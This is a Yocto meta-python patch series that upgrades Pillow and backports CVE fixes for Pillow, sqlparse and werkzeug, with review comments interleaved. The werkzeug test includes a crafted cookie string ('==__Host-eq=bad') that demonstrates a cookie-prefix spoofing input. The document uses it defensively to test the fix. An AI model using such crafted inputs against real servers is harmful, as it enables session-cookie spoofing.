+@@ -18,6 +18,15 @@ OpenType fonts (as well as other font formats supported by the FreeType
+ library). For earlier versions, TrueType support is only available as part of
+ the imToolkit package.
+
++.. warning::
++ To protect against potential DOS attacks when using arbitrary strings as
++ text input, Pillow will raise a ``ValueError`` if the number of characters
++ is over a certain limit, :py:data:`MAX_STRING_LENGTH`.
++
++ This threshold can be changed by setting
++ :py:data:`MAX_STRING_LENGTH`. It can be disabled by setting
++ ``ImageFont.MAX_STRING_LENGTH = None``.
++
+ Example
+ -------
+
+@@ -73,3 +82,12 @@ Constants
+
+ Requires Raqm, you can check support using
+ :py:func:`PIL.features.check_feature` with ``feature="raqm"``.
++
++Constants
++---------
++
++.. data:: MAX_STRING_LENGTH
++
++ Set to 1,000,000, to protect against potential DOS attacks. Pillow will
++ raise a ``ValueError`` if the number of characters is over this limit. The
++ check can be disabled by setting ``ImageFont.MAX_STRING_LENGTH = None``.
+diff --git a/src/PIL/ImageFont.py b/src/PIL/ImageFont.py
+index 3ddc1aaad64..1030985ebc4 100644
+--- a/src/PIL/ImageFont.py
++++ b/src/PIL/ImageFont.py
+@@ -43,6 +43,9 @@
+ RAQM = 1
+
+
++MAX_STRING_LENGTH = 1000000
++
++
+ def __getattr__(name):
+ for enum, prefix in {Layout: "LAYOUT_"}.items():
+ if name.startswith(prefix):
+@@ -67,6 +67,12 @@
+ core = _ImagingFtNotInstalled()
+
+
++def _string_length_check(text):
++ if MAX_STRING_LENGTH is not None and len(text) > MAX_STRING_LENGTH:
++ msg = "too many characters in string"
++ raise ValueError(msg)
++
++
+ _UNSPECIFIED = object()
+
+
+@@ -192,6 +192,7 @@
+
+ :return: ``(left, top, right, bottom)`` bounding box
+ """
++ _string_length_check(text)
+ width, height = self.font.getsize(text)
+ return 0, 0, width, height
+
+@@ -202,6 +202,7 @@
+
+ .. versionadded:: 9.2.0
+ """
++ _string_length_check(text)
+ width, height = self.font.getsize(text)
+ return width
+
+@@ -359,6 +359,7 @@
+
+ :return: Width for horizontal, height for vertical text.
+ """
++ _string_length_check(text)
+ return self.font.getlength(text, mode, direction, features, language) / 64
+
+ def getbbox(
+@@ -418,6 +418,7 @@
+
+ :return: ``(left, top, right, bottom)`` bounding box
+ """
++ _string_length_check(text)
+ size, offset = self.font.getsize(
+ text, mode, direction, features, language, anchor
+ )
+@@ -762,6 +762,7 @@
+ :py:mod:`PIL.Image.core` interface module, and the text offset, the
+ gap between the starting coordinate and the first marking
+ """
++ _string_length_check(text)
+ if fill is _UNSPECIFIED:
+ fill = Image.core.fill
+ else:
+@@ -924,6 +924,7 @@
+ if self.orientation in (Image.Transpose.ROTATE_90, Image.Transpose.ROTATE_270):
+ msg = "text length is undefined for text rotated by 90 or 270 degrees"
+ raise ValueError(msg)
++ _string_length_check(text)
+ return self.font.getlength(text, *args, **kwargs)
+
+
diff --git a/meta-python/recipes-devtools/python/python3-pillow/run-ptest b/meta-python/recipes-devtools/python/python3-pillow/run-ptest
new file mode 100644
index 0000000000..3385d68939
--- /dev/null
+++ b/meta-python/recipes-devtools/python/python3-pillow/run-ptest
@@ -0,0 +1,3 @@
+#!/bin/sh
+
+pytest -o log_cli=true -o log_cli_level=INFO | sed -e 's/\[...%\]//g'| sed -e 's/PASSED/PASS/g'| sed -e 's/FAILED/FAIL/g'|sed -e 's/SKIPED/SKIP/g'| awk '{if ($NF=="PASS" || $NF=="FAIL" || $NF=="SKIP" || $NF=="XFAIL" || $NF=="XPASS"){printf "%s: %s\n", $NF, $0}else{print}}'| awk '{if ($NF=="PASS" || $NF=="FAIL" || $NF=="SKIP" || $NF=="XFAIL" || $NF=="XPASS") {$NF="";print $0}else{print}}'
diff --git a/meta-python/recipes-devtools/python/python3-pillow_9.0.1.bb b/meta-python/recipes-devtools/python/python3-pillow_9.0.1.bb
deleted file mode 100644
index fb86322f77..0000000000
--- a/meta-python/recipes-devtools/python/python3-pillow_9.0.1.bb
+++ /dev/null
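Review bot: `_string_length_check(text)` is added only to the methods these hunks touch (`getbbox`, `getlength`, `getmask2` and `TransposedFont.getlength`), and the header says the change was refreshed from a newer release onto 9.4.0, so any older text-measuring entry point that 9.4.0 still ships and that calls `self.font.getsize(...)` directly (for example the deprecated `getsize` family, if still present) would stay unbounded. It is worth checking the 9.4.0 `ImageFont.py` for such methods and starting each with `_string_length_check(text)`, with a matching `pytest.raises(ValueError)` case in `test_too_many_characters`. The tag is spelled `Upstream-status:` here, while the other patches in this series use `Upstream-Status:`; tooling that matches the tag case-sensitively will not see it. The `ImageFont.py` hunk headers (`@@ -67,6 +67,12 @@`, `@@ -192,6 +192,7 @@` and later) repeat the old start line as the new one although earlier hunks add lines, so the patch looks hand-edited and applies by offset; regenerating it from a git tree would make it exact.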
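Review bot: The `sed -e 's/SKIPED/SKIP/g'` stage never matches, because pytest prints `SKIPPED`, so skipped tests are not rewritten to `SKIP` and fall through both awk stages without being emitted in the `SKIP: name` form. Change it to `sed -e 's/SKIPPED/SKIP/g'`. A one-line comment above the pipeline saying that it rewrites pytest's per-test lines into ptest's `RESULT: name` format would make the sed/awk chain easier to maintain.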
@@ -1,42 +0,0 @@ -SUMMARY = "Python Imaging Library (Fork). Pillow is the friendly PIL fork by Alex \ -Clark and Contributors. PIL is the Python Imaging Library by Fredrik Lundh and \ -Contributors." -HOMEPAGE = "https://pillow.readthedocs.io" -LICENSE = "MIT" -LIC_FILES_CHKSUM = "file://LICENSE;md5=ad081a0aede51e89f8da13333a8fb849" - -SRC_URI = "git://github.com/python-pillow/Pillow.git;branch=9.0.x;protocol=https \ - file://0001-support-cross-compiling.patch \ - file://0001-explicitly-set-compile-options.patch \ -" -SRCREV ?= "82541b6dec8452cb612067fcebba1c5a1a2bfdc8" - -inherit setuptools3 - -PIP_INSTALL_PACKAGE = "Pillow" -PIP_INSTALL_DIST_PATH = "${S}/dist" - -DEPENDS += " \ - zlib \ - jpeg \ - tiff \ - freetype \ - lcms \ - openjpeg \ -" - -RDEPENDS:${PN} += " \ - ${PYTHON_PN}-misc \ - ${PYTHON_PN}-logging \ - ${PYTHON_PN}-numbers \ -" - -CVE_PRODUCT = "pillow" - -S = "${WORKDIR}/git" - -RPROVIDES:${PN} += "python3-imaging" - -BBCLASSEXTEND = "native" - -SRCREV = "6deac9e3a23caffbfdd75c00d3f0a1cd36cdbd5d" diff --git a/meta-python/recipes-devtools/python/python3-pillow_9.4.0.bb b/meta-python/recipes-devtools/python/python3-pillow_9.4.0.bb new file mode 100644 index 0000000000..b9c09127c5 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-pillow_9.4.0.bb 
@@ -0,0 +1,65 @@ +SUMMARY = "Python Imaging Library (Fork). Pillow is the friendly PIL fork by Alex \ +Clark and Contributors. PIL is the Python Imaging Library by Fredrik Lundh and \ +Contributors." +HOMEPAGE = "https://pillow.readthedocs.io" +LICENSE = "MIT" +LIC_FILES_CHKSUM = "file://LICENSE;md5=bc416d18f294943285560364be7cbec1" + +SRC_URI = "git://github.com/python-pillow/Pillow.git;branch=main;protocol=https \ + file://0001-support-cross-compiling.patch \ + file://0001-explicitly-set-compile-options.patch \ + file://run-ptest \ + file://CVE-2023-44271.patch \ + " +SRCREV ?= "82541b6dec8452cb612067fcebba1c5a1a2bfdc8" + +inherit setuptools3 ptest + +PIP_INSTALL_PACKAGE = "Pillow" +PIP_INSTALL_DIST_PATH = "${S}/dist" + +DEPENDS += " \ + zlib \ + jpeg \ + tiff \ + freetype \ + lcms \ + openjpeg \ +" + +RDEPENDS:${PN} += " \ + ${PYTHON_PN}-misc \ + ${PYTHON_PN}-logging \ + ${PYTHON_PN}-numbers \ +" + +RDEPENDS:${PN}-ptest += " \ + bash \ + ghostscript \ + jpeg-tools \ + libwebp \ + ${PYTHON_PN}-core \ + ${PYTHON_PN}-distutils \ + ${PYTHON_PN}-image \ + ${PYTHON_PN}-mmap \ + ${PYTHON_PN}-pytest \ + ${PYTHON_PN}-pytest-timeout \ + ${PYTHON_PN}-resource \ + ${PYTHON_PN}-unixadmin\ + ${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'tk', '', d)} \ +" + +CVE_PRODUCT = "pillow" + +S = "${WORKDIR}/git" + +RPROVIDES:${PN} += "python3-imaging" + +do_install_ptest() { + install -d ${D}${PTEST_PATH}/Tests + cp -rf ${S}/Tests ${D}${PTEST_PATH}/ +} + +BBCLASSEXTEND = "native" + +SRCREV = "a5bbab1c1e63b439de191ef2040173713b26d2da" diff --git a/meta-python/recipes-devtools/python/python3-protobuf_3.20.0.bb b/meta-python/recipes-devtools/python/python3-protobuf_3.20.3.bb index 5c4de4ac2b..76b48e1ffc 100644 --- a/meta-python/recipes-devtools/python/python3-protobuf_3.20.0.bb +++ b/meta-python/recipes-devtools/python/python3-protobuf_3.20.3.bb 
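Review bot: `SRCREV ?= "82541b6dec8452cb612067fcebba1c5a1a2bfdc8"` is copied unchanged from the deleted 9.0.1 recipe and is overridden by `SRCREV = "a5bbab1c1e63b439de191ef2040173713b26d2da"` at the end of the file, so the recipe names two revisions and only the last one is fetched. Dropping the weak default leaves a single pinned revision to audit against the 9.4.0 release. `${PYTHON_PN}-unixadmin\` in `RDEPENDS:${PN}-ptest` is also missing the space before the backslash that every other entry has.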
@@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://PKG-INFO;beginline=8;endline=8;md5=53dbfa56f61b90215a inherit pypi setuptools3 -SRC_URI[sha256sum] = "71b2c3d1cd26ed1ec7c8196834143258b2ad7f444efff26fdc366c6f5e752702" +SRC_URI[sha256sum] = "2e3427429c9cffebf259491be0af70189607f365c2f41c7c3764af6f337105f2" # http://errors.yoctoproject.org/Errors/Details/184715/ # Can't find required file: ../src/google/protobuf/descriptor.proto diff --git a/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb b/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb index 4c4c959eba..035e149518 100644 --- a/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb +++ b/meta-python/recipes-devtools/python/python3-pyudev_0.23.2.bb @@ -21,4 +21,4 @@ RDEPENDS:${PN} = "\ libudev \ " -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-python/recipes-devtools/python/python3-requests-toolbelt/0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch b/meta-python/recipes-devtools/python/python3-requests-toolbelt/0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch new file mode 100644 index 0000000000..baa833b6d2 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-requests-toolbelt/0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch 
@@ -0,0 +1,41 @@ +From 7188b06330e5260be20bce8cbcf0d5ae44e34eaf Mon Sep 17 00:00:00 2001 +From: Jon Dufresne <jon.dufresne@gmail.com> +Date: Fri, 1 Feb 2019 16:30:01 -0800 +Subject: [PATCH] Fix collections.abc deprecation warning in downloadutils + +Warning appears as: + +tests/test_downloadutils.py::test_stream_response_to_specific_filename + requests_toolbelt/downloadutils/stream.py:161: DeprecationWarning: Using or importing the ABCs from 'collections' instead of from 'collections.abc' is deprecated, and in 3.8 it will stop working + if path and isinstance(getattr(path, 'write', None), collections.Callable): + +Upstream-Status: Backport [https://github.com/requests/toolbelt/commit/7188b06330e5260be20bce8cbcf0d5ae44e34eaf] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + requests_toolbelt/downloadutils/stream.py | 3 +-- + 1 file changed, 1 insertion(+), 2 deletions(-) + +diff --git a/requests_toolbelt/downloadutils/stream.py b/requests_toolbelt/downloadutils/stream.py +index eed60a7..1d1c31b 100644 +--- a/requests_toolbelt/downloadutils/stream.py ++++ b/requests_toolbelt/downloadutils/stream.py +@@ -1,6 +1,5 @@ + # -*- coding: utf-8 -*- + """Utilities for dealing with streamed requests.""" +-import collections + import os.path + import re + +@@ -158,7 +157,7 @@ def stream_response_to_file(response, path=None, chunksize=_DEFAULT_CHUNKSIZE): + pre_opened = False + fd = None + filename = None +- if path and isinstance(getattr(path, 'write', None), collections.Callable): ++ if path and callable(getattr(path, 'write', None)): + pre_opened = True + fd = path + filename = getattr(fd, 'name', None) +-- +2.25.1 + diff --git a/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb b/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb index 366f41ca81..72ad7a6180 100644 --- a/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb +++ b/meta-python/recipes-devtools/python/python3-requests-toolbelt_0.9.1.bb 
@@ -6,7 +6,8 @@ LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=71760e0f1dda8cff91b0bc9246caf571" SRC_URI = "file://run-ptest \ - " + file://0001-Fix-collections.abc-deprecation-warning-in-downloadu.patch \ + " SRC_URI[md5sum] = "b1509735c4b4cf95df2619facbc3672e" SRC_URI[sha256sum] = "968089d4584ad4ad7c171454f0a5c6dac23971e9472521ea3b6d49d610aa6fc0" @@ -31,4 +32,4 @@ do_install_ptest() { # remove test test_multipart_encoder.py as it fails, # downloaded file is not supported rm -f ${D}${PTEST_PATH}/tests/test_multipart_encoder.py -} +} diff --git a/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb b/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb index d9465af081..ecc15499cf 100644 --- a/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb +++ b/meta-python/recipes-devtools/python/python3-robotframework-seriallibrary_0.3.1.bb @@ -16,5 +16,3 @@ RDEPENDS:${PN} += " \ ${PYTHON_PN}-pyserial \ ${PYTHON_PN}-robotframework \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb b/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb index 8a30f7cb78..bd0979d0b4 100644 --- a/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb +++ b/meta-python/recipes-devtools/python/python3-snappy_0.6.1.bb @@ -11,5 +11,3 @@ inherit pypi setuptools3 PYPI_PACKAGE = "python-snappy" RDEPENDS:${PN} += "snappy" - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb b/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb index 7cb76b426f..631a45c99e 100644 --- a/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb +++ b/meta-python/recipes-devtools/python/python3-soupsieve_2.3.1.bb 
@@ -12,10 +12,6 @@ SRC_URI += " \ file://run-ptest \ " -RDEPENDS:${PN} += "\ - ${PYTHON_PN}-beautifulsoup4 \ -" - RDEPENDS:${PN}-ptest += " \ ${PYTHON_PN}-pytest \ ${PYTHON_PN}-beautifulsoup4 \ diff --git a/meta-python/recipes-devtools/python/python3-sqlparse/CVE-2023-30608.patch b/meta-python/recipes-devtools/python/python3-sqlparse/CVE-2023-30608.patch new file mode 100644 index 0000000000..41dbf088e1 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-sqlparse/CVE-2023-30608.patch 
@@ -0,0 +1,75 @@ +From fa1cc25e1967228e5d47b9ddb626cc82dba92d7e Mon Sep 17 00:00:00 2001 +From: Andi Albrecht <albrecht.andi@gmail.com> +Date: Wed, 31 May 2023 12:29:07 +0000 +Subject: [PATCH] Remove unnecessary parts in regex for bad escaping. + +The regex tried to deal with situations where escaping in the +SQL to be parsed was suspicious. + +CVE: CVE-2023-30608 + +Upstream-Status: Backport [https://github.com/andialbrecht/sqlparse/commit/c457abd5f097dd13fb21543381e7cfafe7d31cfb] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + CHANGELOG | 15 +++++++++++++++ + sqlparse/keywords.py | 4 ++-- + tests/test_split.py | 4 ++-- + 3 files changed, 19 insertions(+), 4 deletions(-) + +diff --git a/CHANGELOG b/CHANGELOG +index 65e03fc..a584003 100644 +--- a/CHANGELOG ++++ b/CHANGELOG +@@ -1,3 +1,18 @@ ++Backport CVE-2023-30608 Fix ++--------------------------- ++ ++Notable Changes ++ ++* IMPORTANT: This release fixes a security vulnerability in the ++ parser where a regular expression vulnerable to ReDOS (Regular ++ Expression Denial of Service) was used. See the security advisory ++ for details: https://github.com/andialbrecht/sqlparse/security/advisories/GHSA-rrm6-wvj7-cwh2 ++ The vulnerability was discovered by @erik-krogh from GitHub ++ Security Lab (GHSL). Thanks for reporting! ++ ++* Fix regular expressions for string parsing. 
++ ++ + Release 0.4.2 (Sep 10, 2021) + ---------------------------- + +diff --git a/sqlparse/keywords.py b/sqlparse/keywords.py +index 6850628..4e97477 100644 +--- a/sqlparse/keywords.py ++++ b/sqlparse/keywords.py +@@ -66,9 +66,9 @@ SQL_REGEX = { + (r'(?![_A-ZÀ-Ü])-?(\d+(\.\d*)|\.\d+)(?![_A-ZÀ-Ü])', + tokens.Number.Float), + (r'(?![_A-ZÀ-Ü])-?\d+(?![_A-ZÀ-Ü])', tokens.Number.Integer), +- (r"'(''|\\\\|\\'|[^'])*'", tokens.String.Single), ++ (r"'(''|\\'|[^'])*'", tokens.String.Single), + # not a real string literal in ANSI SQL: +- (r'"(""|\\\\|\\"|[^"])*"', tokens.String.Symbol), ++ (r'"(""|\\"|[^"])*"', tokens.String.Symbol), + (r'(""|".*?[^\\]")', tokens.String.Symbol), + # sqlite names can be escaped with [square brackets]. left bracket + # cannot be preceded by word character or a right bracket -- +diff --git a/tests/test_split.py b/tests/test_split.py +index a9d7576..e79750e 100644 +--- a/tests/test_split.py ++++ b/tests/test_split.py +@@ -18,8 +18,8 @@ def test_split_semicolon(): + + + def test_split_backslash(): +- stmts = sqlparse.parse(r"select '\\'; select '\''; select '\\\'';") +- assert len(stmts) == 3 ++ stmts = sqlparse.parse("select '\'; select '\'';") ++ assert len(stmts) == 2 + + + @pytest.mark.parametrize('fn', ['function.sql', +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb b/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb index 0980ff9c24..b5cc41e730 100644 --- a/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb +++ b/meta-python/recipes-devtools/python/python3-sqlparse_0.4.2.bb @@ -6,6 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2b136f573f5386001ea3b7b9016222fc" SRC_URI += "file://0001-sqlparse-change-shebang-to-python3.patch \ file://run-ptest \ + file://CVE-2023-30608.patch \ " SRC_URI[sha256sum] = "0c00730c74263a94e5a9919ade150dfc3b19c574389985446148402998287dae" 
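Review bot: The rewritten `test_split_backslash` no longer passes a backslash to the parser: without the `r` prefix, Python reads each `\'` in `"select '\'; select '\'';"` as a plain `'`, so the `\\'` alternative that the new `tokens.String.Single` and `tokens.String.Symbol` patterns keep is not exercised. Keeping the raw string, for example `stmts = sqlparse.parse(r"select '\''; select '\'';")`, should still give two statements and would cover the escaped-quote path; the expected count is inferred from the pattern shown, so confirm it when running the test. The patch also adds no test for the slow-matching case that the CHANGELOG entry describes, so a regression in these two patterns would go unnoticed.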
diff --git a/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb b/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb index e2102695ec..50f14b17fd 100644 --- a/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb +++ b/meta-python/recipes-devtools/python/python3-txaio_22.2.1.bb @@ -10,5 +10,3 @@ inherit pypi setuptools3 RDEPENDS:${PN} += " \ ${PYTHON_PN}-twisted \ " - -BBCLASSEXTEND = "native nativesdk" diff --git a/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-23934.patch b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-23934.patch new file mode 100644 index 0000000000..3a0f4324a1 --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-23934.patch 
@@ -0,0 +1,117 @@ +From db1457abec7fe27148673f5f8bfdf5c52eb7f29f Mon Sep 17 00:00:00 2001 +From: David Lord <davidism@gmail.com> +Date: Wed, 10 May 2023 11:33:18 +0000 +Subject: [PATCH] Merge pull request from GHSA-px8h-6qxv-m22q + +don't strip leading `=` when parsing cookie + +"src/werkzeug/sansio/http.py" file is not available in the current recipe +version 2.1.1 and this has been introduced from 2.2.0 version. Before 2.2.0 +version, this http.py file was only available in the "src/werkzeug/http.py" +and we could see the same functions available there which are getting modified +in the CVE fix commit. Hence, modifying the same at "src/werkzeug/http.py" file. + +CVE: CVE-2023-23934 + +Upstream-Status: Backport [https://github.com/pallets/werkzeug/commit/cf275f42acad1b5950c50ffe8ef58fe62cdce028] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + CHANGES.rst | 3 +++ + src/werkzeug/_internal.py | 13 +++++++++---- + src/werkzeug/http.py | 4 ---- + tests/test_http.py | 4 +++- + 4 files changed, 15 insertions(+), 9 deletions(-) + +diff --git a/CHANGES.rst b/CHANGES.rst +index 6e809ba..13ef75b 100644 +--- a/CHANGES.rst ++++ b/CHANGES.rst +@@ -4,6 +4,9 @@ + ``RequestEntityTooLarge`` exception is raised on parsing. This mitigates a DoS + attack where a larger number of form/file parts would result in disproportionate + resource use. ++- A cookie header that starts with ``=`` is treated as an empty key and discarded, ++ rather than stripping the leading ``==``. 
++ + + Version 2.1.1 + ------------- +diff --git a/src/werkzeug/_internal.py b/src/werkzeug/_internal.py +index a8b3523..d6290ba 100644 +--- a/src/werkzeug/_internal.py ++++ b/src/werkzeug/_internal.py +@@ -34,7 +34,7 @@ _quote_re = re.compile(rb"[\\].") + _legal_cookie_chars_re = rb"[\w\d!#%&\'~_`><@,:/\$\*\+\-\.\^\|\)\(\?\}\{\=]" + _cookie_re = re.compile( + rb""" +- (?P<key>[^=;]+) ++ (?P<key>[^=;]*) + (?:\s*=\s* + (?P<val> + "(?:[^\\"]|\\.)*" | +@@ -382,16 +382,21 @@ def _cookie_parse_impl(b: bytes) -> t.Iterator[t.Tuple[bytes, bytes]]: + """Lowlevel cookie parsing facility that operates on bytes.""" + i = 0 + n = len(b) ++ b += b";" + + while i < n: +- match = _cookie_re.search(b + b";", i) ++ match = _cookie_re.match(b, i) ++ + if not match: + break + +- key = match.group("key").strip() +- value = match.group("val") or b"" + i = match.end(0) ++ key = match.group("key").strip() ++ ++ if not key: ++ continue + ++ value = match.group("val") or b"" + yield key, _cookie_unquote(value) + + +diff --git a/src/werkzeug/http.py b/src/werkzeug/http.py +index 9369900..ae133e3 100644 +--- a/src/werkzeug/http.py ++++ b/src/werkzeug/http.py +@@ -1205,10 +1205,6 @@ def parse_cookie( + def _parse_pairs() -> t.Iterator[t.Tuple[str, str]]: + for key, val in _cookie_parse_impl(header): # type: ignore + key_str = _to_str(key, charset, errors, allow_none_charset=True) +- +- if not key_str: +- continue +- + val_str = _to_str(val, charset, errors, allow_none_charset=True) + yield key_str, val_str + +diff --git a/tests/test_http.py b/tests/test_http.py +index 5936bfa..59cc179 100644 +--- a/tests/test_http.py ++++ b/tests/test_http.py +@@ -427,7 +427,8 @@ class TestHTTPUtility: + def test_parse_cookie(self): + cookies = http.parse_cookie( + "dismiss-top=6; CP=null*; PHPSESSID=0a539d42abc001cdc762809248d4beed;" +- 'a=42; b="\\";"; ; fo234{=bar;blub=Blah; "__Secure-c"=d' ++ 'a=42; b="\\";"; ; fo234{=bar;blub=Blah; "__Secure-c"=d;' ++ "==__Host-eq=bad;__Host-eq=good;" + ) + assert 
cookies.to_dict() == { + "CP": "null*", +@@ -438,6 +439,7 @@ class TestHTTPUtility: + "fo234{": "bar", + "blub": "Blah", + '"__Secure-c"': "d", ++ "__Host-eq": "good", + } + + def test_dump_cookie(self): +-- +2.40.0 + diff --git a/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-25577.patch b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-25577.patch new file mode 100644 index 0000000000..61551d8fca --- /dev/null +++ b/meta-python/recipes-devtools/python/python3-werkzeug/CVE-2023-25577.patch 
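Review bot: `_cookie_parse_impl` now relies on two things the code does not state: `n = len(b)` is taken before `b += b";"`, so the loop bound excludes the appended sentinel, and pairs with an empty key are skipped here instead of in `parse_cookie`, where the `if not key_str: continue` guard is removed. I would add `# n is taken before the sentinel ';' is appended` next to the assignment and extend the docstring with "Pairs whose key is empty are skipped." Switching from `_cookie_re.search(...)` to `_cookie_re.match(b, i)` also means parsing stops at the first position where the pattern does not match instead of skipping ahead; the rest of `_cookie_re` is outside the hunk, so it is worth confirming that no header can make the remaining cookies be dropped silently.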
@@ -0,0 +1,231 @@ +From 5a56cdcbaec2153cd67596c6c2c8056e1ea5ed56 Mon Sep 17 00:00:00 2001 +From: David Lord <davidism@gmail.com> +Date: Tue, 2 May 2023 11:31:10 +0000 +Subject: [PATCH] Merge pull request from GHSA-xg9f-g7g7-2323 + +limit the maximum number of multipart form parts + +CVE: CVE-2023-25577 + +Upstream-Status: Backport [https://github.com/pallets/werkzeug/commit/517cac5a804e8c4dc4ed038bb20dacd038e7a9f1] + +Signed-off-by: Narpat Mali <narpat.mali@windriver.com> +--- + CHANGES.rst | 5 +++++ + docs/request_data.rst | 37 +++++++++++++++++--------------- + src/werkzeug/formparser.py | 12 ++++++++++- + src/werkzeug/sansio/multipart.py | 8 +++++++ + src/werkzeug/wrappers/request.py | 8 +++++++ + tests/test_formparser.py | 9 ++++++++ + 6 files changed, 61 insertions(+), 18 deletions(-) + +diff --git a/CHANGES.rst b/CHANGES.rst +index a351d7c..6e809ba 100644 +--- a/CHANGES.rst ++++ b/CHANGES.rst +@@ -1,5 +1,10 @@ + .. currentmodule:: werkzeug + ++- Specify a maximum number of multipart parts, default 1000, after which a ++ ``RequestEntityTooLarge`` exception is raised on parsing. This mitigates a DoS ++ attack where a larger number of form/file parts would result in disproportionate ++ resource use. ++ + Version 2.1.1 + ------------- + +diff --git a/docs/request_data.rst b/docs/request_data.rst +index 83c6278..e55841e 100644 +--- a/docs/request_data.rst ++++ b/docs/request_data.rst +@@ -73,23 +73,26 @@ read the stream *or* call :meth:`~Request.get_data`. + Limiting Request Data + --------------------- + +-To avoid being the victim of a DDOS attack you can set the maximum +-accepted content length and request field sizes. The :class:`Request` +-class has two attributes for that: :attr:`~Request.max_content_length` +-and :attr:`~Request.max_form_memory_size`. +- +-The first one can be used to limit the total content length. For example +-by setting it to ``1024 * 1024 * 16`` the request won't accept more than +-16MB of transmitted data. 
+- +-Because certain data can't be moved to the hard disk (regular post data) +-whereas temporary files can, there is a second limit you can set. The +-:attr:`~Request.max_form_memory_size` limits the size of `POST` +-transmitted form data. By setting it to ``1024 * 1024 * 2`` you can make +-sure that all in memory-stored fields are not more than 2MB in size. +- +-This however does *not* affect in-memory stored files if the +-`stream_factory` used returns a in-memory file. ++The :class:`Request` class provides a few attributes to control how much data is ++processed from the request body. This can help mitigate DoS attacks that craft the ++request in such a way that the server uses too many resources to handle it. Each of ++these limits will raise a :exc:`~werkzeug.exceptions.RequestEntityTooLarge` if they are ++exceeded. ++ ++- :attr:`~Request.max_content_length` Stop reading request data after this number ++ of bytes. It's better to configure this in the WSGI server or HTTP server, rather ++ than the WSGI application. ++- :attr:`~Request.max_form_memory_size` Stop reading request data if any form part is ++ larger than this number of bytes. While file parts can be moved to disk, regular ++ form field data is stored in memory only. ++- :attr:`~Request.max_form_parts` Stop reading request data if more than this number ++ of parts are sent in multipart form data. This is useful to stop a very large number ++ of very small parts, especially file parts. The default is 1000. ++ ++Using Werkzeug to set these limits is only one layer of protection. WSGI servers ++and HTTPS servers should set their own limits on size and timeouts. The operating system ++or container manager should set limits on memory and processing time for server ++processes. + + + How to extend Parsing? 
+diff --git a/src/werkzeug/formparser.py b/src/werkzeug/formparser.py +index 10d58ca..bebb2fc 100644 +--- a/src/werkzeug/formparser.py ++++ b/src/werkzeug/formparser.py +@@ -179,6 +179,8 @@ class FormDataParser: + :param cls: an optional dict class to use. If this is not specified + or `None` the default :class:`MultiDict` is used. + :param silent: If set to False parsing errors will not be caught. ++ :param max_form_parts: The maximum number of parts to be parsed. If this is ++ exceeded, a :exc:`~exceptions.RequestEntityTooLarge` exception is raised. + """ + + def __init__( +@@ -190,6 +192,8 @@ class FormDataParser: + max_content_length: t.Optional[int] = None, + cls: t.Optional[t.Type[MultiDict]] = None, + silent: bool = True, ++ *, ++ max_form_parts: t.Optional[int] = None, + ) -> None: + if stream_factory is None: + stream_factory = default_stream_factory +@@ -199,6 +203,7 @@ class FormDataParser: + self.errors = errors + self.max_form_memory_size = max_form_memory_size + self.max_content_length = max_content_length ++ self.max_form_parts = max_form_parts + + if cls is None: + cls = MultiDict +@@ -281,6 +286,7 @@ class FormDataParser: + self.errors, + max_form_memory_size=self.max_form_memory_size, + cls=self.cls, ++ max_form_parts=self.max_form_parts, + ) + boundary = options.get("boundary", "").encode("ascii") + +@@ -346,10 +352,12 @@ class MultiPartParser: + max_form_memory_size: t.Optional[int] = None, + cls: t.Optional[t.Type[MultiDict]] = None, + buffer_size: int = 64 * 1024, ++ max_form_parts: t.Optional[int] = None, + ) -> None: + self.charset = charset + self.errors = errors + self.max_form_memory_size = max_form_memory_size ++ self.max_form_parts = max_form_parts + + if stream_factory is None: + stream_factory = default_stream_factory +@@ -409,7 +417,9 @@ class MultiPartParser: + [None], + ) + +- parser = MultipartDecoder(boundary, self.max_form_memory_size) ++ parser = MultipartDecoder( ++ boundary, self.max_form_memory_size, 
